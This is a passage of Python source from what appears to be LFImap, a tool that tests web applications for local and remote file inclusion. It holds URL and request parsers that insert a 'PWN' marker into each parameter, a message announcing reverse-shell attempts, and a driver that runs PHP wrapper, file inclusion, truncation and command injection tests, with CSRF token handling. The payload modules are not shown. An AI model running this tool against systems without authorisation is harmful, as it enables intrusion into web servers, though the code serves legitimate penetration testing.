        print(f"Error parsing HTTP request: {e}", flush = True)
        return None


def is_string_in_dict(s, my_dict):
    """
    Checks if a given `s` (str) is inside a provided `my_dict` (dict)
    Returns boolean.
    """
    for key, value in my_dict.items():
        if s in str(key) or s in str(value):
            return True
    return False


def parse_url_parameters(url):
    """
    Parse a provided `url` to its components
    Returns `str` of the parameters joined with ', '
    """
    parsed_url = urlparse(url)
    query_parameters = parse_qs(parsed_url.query)

    parameter_names = list(query_parameters.keys())
    parameter_names_combined = ", ".join(parameter_names)

    return parameter_names_combined


def parse_url_from_request_file(file_path, force_ssl=False):
    """
    Parse a URL from a HTTP Request file. It will return a URL even if the request file
      is not for a GET request
    Returns a `url` from the HTTP Request file
    """
    args  = init_args()
    try:
        with open(file_path, "r", encoding="utf-8") as file:
            http_request = file.read()
            lines = http_request.split("\n")
            get_request_line = lines[0]
            parts = get_request_line.split(" ", 2)
            if len(parts) == 3:
                method, endpoint, protocol = parts
            else:
                method, endpoint = parts
                protocol = ""
            url_parts = endpoint.split("?", 1)
            path = url_parts[0]
            query_string = url_parts[1] if len(url_parts) > 1 else ""
            query_params = []
            if query_string:
                params = query_string.split("&")
                for param in params:
                    if "=" in param:
                        name, value = param.split("=")
                    else:
                        name = param
                        value = ""
                    query_params.append(f"{name}={value}")
            host_line = next((line for line in lines if line.startswith("Host:")), None)
            if host_line:
                host = host_line.split(": ", 1)[1]
            else:
                raise Exception("Host header not found in the request.")

            if args['force_ssl'] or force_ssl:
                url = f"https://{host}{path}"
            else:
                url = f"http://{host}{path}"
            if query_params:
                url += f"?{'&'.join(query_params)}"

            return url
    except FileNotFoundError:
        raise Exception("File not found. Please provide a valid file path.")
    except Exception as e:
        raise Exception("An error occurred while parsing the request:", str(e))


def parseGet(url):
    """
    Parse a given URL and return back a list of URLs for testing,
      each URL is for a given parameter being tested and the rest left
      unmodified

    Returns list of urls
    """
    args  = init_args()
    placeholder = {}
    testUrls = []
    # Dictionary of GET parameters
    getParams = get_all_params(url)

    if len(getParams) == 0:
        return [url]

    u = urlparse(url)
    query = parse_qs(u.query)

    scheme = u.scheme
    creds = u.netloc
    path = u.path
    q = query

    baseUrl = ""
    baseUrl += scheme
    baseUrl += "://"
    baseUrl += creds
    baseUrl += path

    for test in getParams.keys():
        testParameter = "".join(test)
        recreated = baseUrl

        if testParameter == "":
            testUrls.append(recreated)
            break

        c = 0
        for k, v in getParams.items():
            if c == 0:
                recreated += "?"
            else:
                recreated += "&"

            recreated += "".join(k)
            recreated += "="
            if "".join(k) == testParameter:
                recreated += args['param']  # PWN
            else:
                num = len(v)
                tmp = 0

                # If parameter is not passed as array
                if num <= 1:
                    v = list(itertools.chain(*v))
                    recreated += "".join(v)

                # Multiple parameters are passed with same name (as array)
                else:
                    for item in v:
                        if tmp != 0:
                            recreated += "&" + "".join(k) + "="
                        recreated += args['param']  # PWN
                        tmp += 1
            c += 1

        testUrls.append(recreated)

    # Return list of urls parsed and ready to be tested with PWN placeholders
    return testUrls


def parseFormDataLine(postData):
    """
    Parse FormData and return a list of testable parameters
    Returns list.
    """
    if postData == "":
        return ""

    parameters = postData.split("&")
    num_parameters = len(parameters)
    testParams = []

    for i in range(num_parameters):
        temp_params = []

        for idx, parameter in enumerate(parameters):
            name_value_pair = parameter.split("=")
            name = name_value_pair[0]
            value = (
                "PWN"
                if idx == i
                else (name_value_pair[1] if len(name_value_pair) > 1 else "")
            )

            prepareString = f"{name}={value}"
            temp_params.append(prepareString)

        testParams.append("&".join(temp_params))

    return testParams


def get_all_params(url):
    """
    Returns a dict of parameters from a given URL

    Returns dict. 
    """
    query_string = urlsplit(url).query
    params = {}
    for param in query_string.split("&"):
        if "=" in param:
            key, value = param.split("=", 1)
        else:
            key, value = param, [""]
        params[key] = [value]
    return params


def get_params_with_param(url):
    """
    Returns a `str` of parameters from a given URL (GET)

    Returns str (delimiter used ', ').
    """
    args  = init_args()
    query_string = urlsplit(url).query
    params = dict(parse_qsl(query_string))

    matching_params = [key for key, value in params.items() if args['param'] in value]
    return ", ".join(matching_params)


def post_params_with_param(url):
    """
    Returns a `str` of parameters from a given URL (POST)

    Returns str (delimiter used ', ').
    """
    args  = init_args()
    parsed_params = parse_qs(url)

    params_with_pwn_value = [
        param for param, value in parsed_params.items() if args['param'] in value[0]
    ]
    result = ", ".join(params_with_pwn_value)
    return result


def getHeadersToTest(dictionary):
    """
    Parse a given dictionary and returns a str of parameters

    Returns str (delimiter used ', ')
    """
    args = init_args()
    param = args['param']  # Example: 'PWN'
    matching_keys = [
        key
        for key, value in dictionary.items()
        if param.lower() in (value.decode(errors="ignore").lower() if isinstance(value, bytes) else str(value).lower())
    ]
    return ", ".join(matching_keys)


def compare_dicts(dict1, dict2):
    """
    Compare two dictionaries and return True if they have the same keys

    Returns boolean.
    """
    if set(dict1.keys()) != set(dict2.keys()):
        return False

    # Check if the values associated with each key are equal
    for key in dict1:
        if dict1[key] != dict2[key]:
            return False

    # If all checks pass, the dictionaries are the same
    return True



"""Info"""
from src.utils.colors import Colors


def printInfo(ip, port, shellType, attackMethod):
    """Prints info about reverse shell attack to stdout"""
    print(
        Colors().green("[.]")
        + f" Trying to pop reverse shell to {ip}:{port} using {shellType} via {attackMethod}...",
        flush = True
    )


def printFancyString(newString, lastPrintedStringLen):
    """Print fency string"""
    if len(newString) < lastPrintedStringLen:
        difference = lastPrintedStringLen - len(newString)
        print("\r" + newString + difference * " ", end="", flush = True)
    else:
        print("\r" + newString, end="", flush = True)

    return len(newString)



#!/usr/bin/env python3

import sys
import os

# Needed because of the availability of the src modules after installation
if '__file__' in globals():
    sys.path.append(os.path.dirname(os.path.abspath(__file__)))
else:
    sys.path.append(os.path.dirname(os.path.abspath(__name__)))

from urllib3.exceptions import NewConnectionError
from requests.exceptions import ConnectTimeout
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable/Mute TLS errors
from requests.packages.urllib3 import disable_warnings
from requests import Response
disable_warnings(InsecureRequestWarning)

# Import configurations
from src.configs import config

# Import utilities
from src.utils.arguments import init_args
from src.utils.args_check import checkArgs
from src.utils.cleanup import lfimap_cleanup
from src.utils.stats import stats

# Import custom request functionality
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST

# Import attack modules
from src.attacks.heur import test_heuristics
from src.attacks.filter import test_filter
from src.attacks.input import test_input
from src.attacks.data import test_data
from src.attacks.expect import test_expect
from src.attacks.rfi import test_rfi
from src.attacks.cmdi import test_cmd_injection
from src.attacks.file import test_file_trunc
from src.attacks.trunc import test_trunc
from src.utils.colors import Colors
from src.utils.parseurl import get_params_with_param
from src.utils.parseurl import post_params_with_param
from src.utils.parseurl import getHeadersToTest
from src.utils.parseurl import is_valid_url
from src.httpreqs.request import extract_all_parameters
from src.httpreqs.request import extract_input_fields

def main():
    
    # Check command-line arguments
    if not checkArgs():
        sys.exit(-1)

    args  = init_args()

    config.proxies["http"] = args['proxyAddr']
    config.proxies["https"] = args['proxyAddr']

    config.lastPrintedStringLen = 1
    # If multiple URLS are specified from a file
    if args['f']:

        for iteration, url in enumerate(config.parsedUrls):
            if not args['postreq'] or "".join(args['postreq'][0]) == "":
                args['postreq'] = [""]

                # Just in case check if URL is correctly formatted, it should be always correct up to this point, though...
                if not is_valid_url(url):
                    print(
                        Colors().red("\n[-]")
                        + " URL '"
                        + url
                        + "'' is not valid. Skipping...",
                        flush = True
                    )
                    continue

                print(
                    "\n"
                    + Colors().lightblue("[i]")
                    + " Parsing URL ["
                    + str(iteration + 1)
                    + "/"
                    + str(len(config.parsedUrls))
                    + "]: '"
                    + url
                    + "'",
                    flush = True
                )

            # CSRF token refresh with -F is not supported yet #TODO
            args['updateCsrfToken'] = False
            args['previouscsrf'] = False

            # POST testing with -F is not supported
            args['is_tested_param_post'] = False

            try:
                # Check if url is accessible
                tempUrl, headers, postTest = prepareRequest(args['param'], "test", url, "")
                try:
                    r, _ = REQUEST(
                        tempUrl, headers, postTest, config.proxies, "test", "test"
                    )
                    okCode = False

                    # In case expection has occurred and not caught
                    if r == False:
                        continue

                    if args['http_valid']:
                        for http_code in args['http_valid']:
                            if http_code == r.status_code:
                                okCode = True

                        if not okCode:
                            print(
                                Colors().red("[-] ")
                                + " URL '"
                                + tempUrl
                                + "' is not accessible. HTTP code "
                                + str(r.status_code)
                                + ".",
                                flush = True
                            )
                            print(
                                Colors().blue("[i]")
                                + " Try specifying parameter --http-ok "
                                + str(r.status_code)
                                + "\n",
                                flush = True
                            )
                            continue
                    else:
                        if r.status_code != 200 and r.status_code != 204:
                            print(
                                Colors().red("[-]")
                                + " URL '"
                                + tempUrl
                                + "' is not accessible. HTTP code "
                                + str(r.status_code)
                                + ". Skipping...",
                                flush = True
                            )
                            print(
                                Colors().blue("[i]")
                                + " Try specifying parameter --http-ok "
                                + str(r.status_code)
                                + "\n",
                                flush = True
                            )
                            continue
                except:
                    print(
                        Colors().red("[-]")
                        + " Exception occurred while accessing '"
                        + tempUrl
                        + "'. Skipping...",
                        flush = True
                    )
                    raise

                relativeVulnCount = stats["vulns"]
                stats["urls"] += 1

                if not args['postreq'] or "".join(args['postreq'][0]) == "":
                    if not args['verbose']:
                        print("", flush = True)
                    print(
                        Colors().yellow("[i]")
                        + " Testing GET '"
                        + get_params_with_param(url)
                        + "' parameter...",
                        flush = True
                    )

                # Perform all tests
                if args['test_all']:
                    test_heuristics(url, "")
                    test_filter(url, "")
                    test_input(url, "")
                    test_data(url, "")
                    test_expect(url, "")
                    test_rfi(url, "")
                    test_file_trunc(url, "")
                    test_trunc(url, "")
                    test_cmd_injection(url, "")

                    if stats["vulns"] == relativeVulnCount:
                        print(
                            Colors().red("[-]")
                            + " GET parameter '"
                            + get_params_with_param(url)
                            + "' doesn't seem to be vulnerable.\n",
                            flush = True
                        )
                    continue

                default = True

                if args['heuristics']:
                    default = False
                    test_heuristics(url, "")
                if args['php_filter']:
                    default = False
                    test_filter(url, "")
                if args['php_input']:
                    default = False
                    test_input(url, "")
                if args['php_data']:
                    default = False
                    test_data(url, "")
                if args['php_expect']:
                    default = False
                    test_expect(url, "")
                if args['rfi']:
                    default = False
                    test_rfi(url, "")
                if args['file']:
                    default = False
                    test_file_trunc(url, "")
                if args['trunc']:
                    default = False
                    test_trunc(url, "")
                if args['cmd']:
                    default = False
                    test_cmd_injection(url, "")

                # Default behaviour
                if default:
                    test_filter(url, "")
                    test_input(url, "")
                    test_data(url, "")
                    test_expect(url, "")
                    test_rfi(url, "")
                    test_file_trunc(url, "")
                    test_trunc(url, "")

                if stats["vulns"] == relativeVulnCount:
                    print(
                        Colors().red("[-]")
                        + " GET parameter '"
                        + get_params_with_param(url)
                        + "' doesn't seem to be vulnerable.\n",
                        flush = True
                    )

            except ConnectTimeout:
                print(Colors().red("[-]") + " URL '" + url + "' timed out. Skipping...", flush = True)
            except ConnectionRefusedError:
                print(Colors().red("[-]") + " Failed to establish connection to " + url, flush = True)
            except NewConnectionError:
                print(Colors().red("[-]") + " Failed to establish connection to " + url, flush = True)
            except OSError:
                print(Colors().red("[-]") + " Failed to establish connection to " + url, flush = True)
            except KeyboardInterrupt:
                print("\nKeyboard interrupt detected. Exiting...", flush = True)
                lfimap_cleanup(config.webDir)
            except:
                raise

        lfimap_cleanup(config.webDir)

    # If single URL is specified
    else:
        turls = []  # list of strings
        tposts = []  # list of strings
        theaders = []  # list of dicts

        # Find out where the args['param'] are located at
        if args['param'] in config.url:
            pwnInGetExists = True
        else:
            pwnInGetExists = False

        if config.postreq and args['param'] in config.postreq:
            pwnInPostExists = True
        else:
            pwnInPostExists = False

        found_in_headkeys = args['param'] in args['httpheaders'].keys()
        found_in_headvalues = any(args['param'] in str(value) for value in args['httpheaders'].values())

        if found_in_headkeys or found_in_headvalues:
            pwnInHeadersExists = True
        else:
            pwnInHeadersExists = False

        # Default val
        args['updateCsrfToken'] = False
        args['previouscsrf'] = False

        tempUrl = ""

        # Test header
        if pwnInHeadersExists:
            print(args['param'],)
            tempUrl, headers, postTest = prepareRequest(
                args['param'], args['param'], config.url, config.postreq
            )
            turls.append(tempUrl)
            theaders.append(headers)
            tposts.append(postTest)
        else:
            if pwnInGetExists or not pwnInPostExists and args['param'] in args['url'][0]:
                # If the PWN is not in the url, parse all of the parameters
                if args['param'] not in config.url:
                    for iteration, url in enumerate(args['url']):
                        tempUrl, headers, postTest = prepareRequest(
                            args['param'], args['param'], url, config.postreq
                        )
                        turls.append(tempUrl)
                        theaders.append(headers)
                        tposts.append(postTest)

                # Parse only parameters that have PWN keyword
                else:
                    pwnInGetExists = True
                    tempUrl, headers, postTest = prepareRequest(
                        args['param'], args['param'], config.url, config.postreq
                    )
                    turls.append(tempUrl)
                    theaders.append(headers)
                    tposts.append(postTest)

            if not pwnInGetExists and not pwnInHeadersExists:
                # If the PWN keyword is in the FORM-data line
                if config.postreq and args['param'] not in config.postreq:
                    for i, post in enumerate(args['postreq']):
                        tempUrl, headers, postTest = prepareRequest(
                            args['param'], args['param'], config.url, post
                        )
                        turls.append(tempUrl)
                        theaders.append(headers)
                        tposts.append(postTest)
                elif config.postreq != None:
                    tempUrl, headers, postTest = prepareRequest(
                        args['param'], args['param'], config.url, config.postreq
                    )
                    turls.append(tempUrl)
                    theaders.append(headers)
                    tposts.append(postTest)

        # No arguments found to test, if this is not set.
        if tempUrl == None or tempUrl == "":
            print(Colors().red("[-]") + " No arguments to test. Exiting...", flush = True)
            sys.exit(-1)

        # TODO edge case where the url is not specified, but the csrf token is inside the request.?
        csrf_r = ""
        if args['csrfUrl']:
            # Send request to the csrf token endpoint
            if not args['csrfMethod']:
                args['csrfMethod'] = "GET"
            if not args['csrfData']:
                if args['postreq']:
                    args['csrfData'] = args['postreq'][0]
                else:
                    args['csrfData'] = ""
            csrf_r, _ = REQUEST(
                args['csrfUrl'],
                headers,
                args['csrfData'],
                config.proxies,
                "test",
                "test",
                exploit=False,
                followRedirect=True,
                isCsrfRequest=True,
            )

        # Test request to see if the site is accessible
        r, _ = REQUEST(
            config.url,
            headers,
            config.postreq,
            config.proxies,
            "test",
            "test",
            exploit=False,
            followRedirect=True,
            isCsrfRequest=False,
        )
        # Specify which response statuses to always treat as valid
        if not args['http_valid']:
            args['http_valid'] = [200, 204, 301, 302, 303]

        # Client-side error happened for HTTP status >=400 and <500
        if hasattr(r, 'status_code'):
            if r.status_code >= 400 and r.status_code < 500 and r.status_code not in args['http_valid']:
                print(
                    Colors().red("[-]")
                    + " Initial request yielded "
                    + str(r.status_code)
                    + " response. Request might not be correctly specified. To force-continue specify '--http-ok "
                    + str(r.status_code)
                    + "' to treat it as expected.",
                    flush = True
                )
                sys.exit(-1)

        # Server-side error happened for HTTP status >= 500
        elif r and r.status_code >= 500:
            if r.status_code not in args['http_valid']:
                print(
                    Colors().red("[-]")
                    + " Initial request yielded "
                    + str(r.status_code)
                    + " response. Application might not be available. To force-continue specify '--http-ok "
                    + str(r.status_code)
                    + "' to treat it as expected.",
                    flush = True
                )
                sys.exit(-1)

        if(isinstance(r, Response) and
            "no&#32;response&#32;received&#32;from&#32;remote&#32;server&#46;"
            in r.text.lower()
        ):
            print(
                Colors().red("[-]")
                + " No response received from remote server. This could be proxy's response due to unresponsive application server.",
                flush = True
            )
            inp = input(
                "\n"
                + Colors().yellow("[?]")
                + " Web application might not be available. Do you still want to force-continue [y/N] ",
                flush = True
            )
            if inp in ["n", "N", ""]:
                print("User interrupt, exiting..."),
                flush = True
                sys.exit(-1)

        # This check needs to contain r.status_code, instead of just r, because in edge cases like 404 Response if(r) yields false for some reason
        # Might be a bug in requests library, workaround fix #115
        if isinstance(r, Response):
            if not r.status_code and not args['no_stop']:
                print(
                    Colors().red("[-]")
                    + " Response object is not clearly received. Application might not be available, as response's status_code is None. Check if request is correctly specified...",
                    flush = True
                )

                lfimap_cleanup(config.webDir)
        else:
            print(
                    Colors().red("[-]")
                    + " Response object is not clearly received. Application might not be available, as response's status_code is None. Check if request is correctly specified...",
                    flush = True
                )
            
            lfimap_cleanup(config.webDir)

        if csrf_r:
            input_fields = extract_input_fields(csrf_r.text)
            parameters = extract_all_parameters(config.url, config.postreq)
        else:
            input_fields = extract_input_fields(r.text)
            parameters = extract_all_parameters(config.url, config.postreq)

        inp = "Initial"
        # Check if csrf token is present in the request.
        if args['csrfParameter']:
            if args['csrfParameter'] not in parameters.keys():
                print(
                    Colors().red("[-]")
                    + " Specified csrf parameter '"
                    + args['csrfParameter']
                    + "' not found in the initial request. LFImap will not be able to refresh the csrf token.",
                    flush = True
                )
                args['updateCsrfToken'] = False
            elif args['csrfParameter'] not in input_fields.keys():
                print(
                    Colors().red("[-]")
                    + " Specified csrf parameter '"
                    + args['csrfParameter']
                    + "' not found in the initial response. LFImap will not be able to refresh the csrf token.",
                    flush = True
                )
                args['updateCsrfToken'] = False
            elif parameters[args['csrfParameter']] != input_fields[args['csrfParameter']]:
                inp = input(
                    "\n"
                    + Colors().yellow("[?]")
                    + " It appears that CSRF value is refreshed after each request. Do you wish to automatically update tokens? [Y/n] "
                )
            else:
                print(
                    Colors().blue("[i]")
                    + " It appears that CSRF token is not refreshed after each request. LFImap will not automatically update the csrf token in requests",
                    flush = True
                )
        else:
            for param_name in parameters.keys():
                if param_name in config.csrf_params:
                    args['csrfParameter'] = param_name
                    # If there is the same key value pair in both dicts
                    if any(item in input_fields.items() for item in parameters.items()):
                        print(
                            Colors().blue("[i]")
                            + " Parameter '"
                            + param_name
                            + "' appears to be anti-forgery token, but it hasn't been refreshed by the web application. LFImap will not auto-refresh csrf token value",
                            flush = True
                        )
                        args['updateCsrfToken'] = False
                    elif len(input_fields) == 0:
                        if not args['csrfUrl']:
                            print(
                                Colors().blue("[i]")
                                + " Parameter '"
                                + param_name
                                + "' appears to be anti-forgery token, however the csrf token is not present in the response. Please specify the  '--csrf-url' to auto-refresh the token.",
                                flush = True
                            )
                            args['updateCsrfToken'] = False
                    elif (
                        parameters[args['csrfParameter']]
                        != input_fields[args['csrfParameter']]
                    ):
                        inp = input(
                            "\n"
                            + Colors().yellow("[?]")
                            + " It appears that CSRF value is refreshed after each request. Do you wish to automatically update tokens? [Y/n] "
                        )
                    else:
                        print(
                            Colors().blue("[i]")
                            + " It appears that CSRF token is not refreshed after each request. LFImap will not automatically update the csrf token in requests",
                            flush = True
                        )

        if inp in ["y", "Y", ""]:
            args['updateCsrfToken'] = True
        else:
            args['updateCsrfToken'] = False

        okCode = False
        if args['http_valid']:
            for http_code in args['http_valid']:
                if http_code == r.status_code:
                    okCode = True

            if r and not okCode:
                print(
                    Colors().red("[-] ")
                    + tempUrl
                    + " is not accessible. HTTP code "
                    + str(r.status_code)
                    + ".",
                    flush = True
                )
                print(
                    Colors().blue("[i]")
                    + " Try specifying parameter --http-ok "
                    + str(r.status_code)
                    + "\n",
                    flush = True
                )
                if not args['no_stop']:
                    sys.exit(-1)

        else:
            if r and r.status_code != 200 and r.status_code != 204:
                print(
                    Colors().red("[-]")
                    + tempUrl
                    + " is not accessible. HTTP code "
                    + str(r.status_code)
                    + ".  Exiting...",
                    flush = True
                )
                print(
                    Colors().blue("[i]")
                    + " Try specifying parameter --http-ok "
                    + str(r.status_code)
                    + "\n",
                    flush = True
                )
                if not args['no_stop']:
                    sys.exit(-1)

        # Main loop that will perform testing
        for iteration, url in enumerate(turls):
            post = tposts[iteration]
            headers = theaders[iteration]

            if pwnInHeadersExists:
                # Handle plural
                if "," in getHeadersToTest(headers):
                    print(
                        "\n"
                        + Colors().yellow("[i]")
                        + " Testing headers '"
                        + getHeadersToTest(headers)
                        + "'",
                        flush = True
                    )
                else:
                    print(
                        "\n"
                        + Colors().yellow("[i]")
                        + " Testing header '"
                        + getHeadersToTest(headers)
                        + "'",
                        flush = True
                    )

                # Needed to handle -i
                args['is_tested_param_post'] = False  

            if args['param'] in url:
                print(
                    "\n"
                    + Colors().yellow("[i]")
                    + " Testing GET '"
                    + get_params_with_param(url)
                    + "' parameter...",
                    flush = True
                )

                # Needed to handle -i
                args['is_tested_param_post'] = False 

            elif args['postreq'] and args['param'] in post:
                print(
                    "\n"
                    + Colors().yellow("[i]")
                    + " Testing form-line '"
                    + post_params_with_param(post)
                    + "' parameter...",
                    flush = True
                )

                # Needed to handle -i
                args['is_tested_param_post'] = True

            else:
                is_tested_param_post = False

            # Skip CSRF parameter testing..
            if args['csrfParameter']:
                if (
                    args['csrfParameter'] + "=" + args['param'] in url
                    or args['csrfParameter'] + "=" + args['param'] in post
                ):
                    print(
                        Colors().blue("[-]") + " Skipping testing of anti-forgery token",
                        flush = True
                    )
                    continue
            relativeVulnCount = stats["vulns"]
            stats["urls"] += 1

            # Perform all tests
            if args['test_all']:
                test_heuristics(url, post)
                test_filter(url, post)
                test_input(url, post)
                test_data(url, post)
                test_expect(url, post)
                test_file_trunc(url, post)
                test_rfi(url, post)
                test_trunc(url, post)
                test_cmd_injection(url, post)

                if stats["vulns"] == relativeVulnCount and pwnInHeadersExists:
                    # Handle plural
                    if "," in getHeadersToTest(headers):
                        print(
                            Colors().red("[-]")
                            + " Headers '"
                            + getHeadersToTest(headers)
                            + "' doesn't seem to be vulnerable.",
                            flush = True
                        )
                    else:
                        print(
                            Colors().red("[-]")
                            + " Header '"
                            + getHeadersToTest(headers)
                            + "' doesn't seem to be vulnerable.",
                            flush = True
                        )

                if stats["vulns"] == relativeVulnCount:
                    if args['param'] in url:
                        print(
                            Colors().red("[-]")
                            + " GET parameter '"
                            + get_params_with_param(url)
                            + "' doesn't seem to be vulnerable....",
                            flush = True
                        )
                    if args['postreq'] and args['param'] in post:
                        print(
                            Colors().red("[-]")
                            + " Form-line parameter '"
                            + post_params_with_param(post)
                            + "' doesn't seem to be vulnerable....",
                            flush = True
                        )
                continue

            default = True

            if args['heuristics']:
                default = False
                test_heuristics(url, post)
            if args['php_filter']:
                default = False
                test_filter(url, post)
            if args['php_input']:
                default = False
                test_input(url, post)
            if args['php_data']:
                default = False
                test_data(url, post)
            if args['php_expect']:
                default = False
                test_expect(url, post)
            if args['file']:
                default = False
                test_file_trunc(url, post)
            if args['rfi']:
                default = False
                test_rfi(url, post)
            if args['trunc']:
                default = False
                test_trunc(url, post)
            if args['cmd']:
                default = False
                test_cmd_injection(url, post)

            # Default behaviour
            if default:
                test_filter(url, post)
                test_input(url, post)
                test_data(url, post)
                test_expect(url, post)
                test_file_trunc(url, post)
                test_rfi(url, post)
                test_trunc(url, post)

            if stats["vulns"] == relativeVulnCount and pwnInHeadersExists:
                # Handle plural
                if "," in getHeadersToTest(headers):
                    print(
                        Colors().blue("[i]")
                        + " Headers '"
                        + getHeadersToTest(headers)
                        + "' doesn't seem to be vulnerable.",
                        flush = True
                    )
                else:
                    print(
                        Colors().blue("[i]")
                        + " Header '"
                        + getHeadersToTest(headers)
                        + "' doesn't seem to be vulnerable.",
                        flush = True
                    )

            if stats["vulns"] == relativeVulnCount:
                if args['param'] in url:
                    print(
                        Colors().red("[-]")
                        + " GET parameter '"
                        + get_params_with_param(url)
                        + "' doesn't seem to be vulnerable....",
                        flush = True
                    )
                if args['postreq'] and args['param'] in post:
                    print(
                        Colors().red("[-]")
                        + " Form-line parameter '"
                        + post_params_with_param(post)
                        + "' doesn't seem to be vulnerable....",
                        flush = True
                    )

        lfimap_cleanup(config.webDir)


if __name__ == "__main__":
    main()
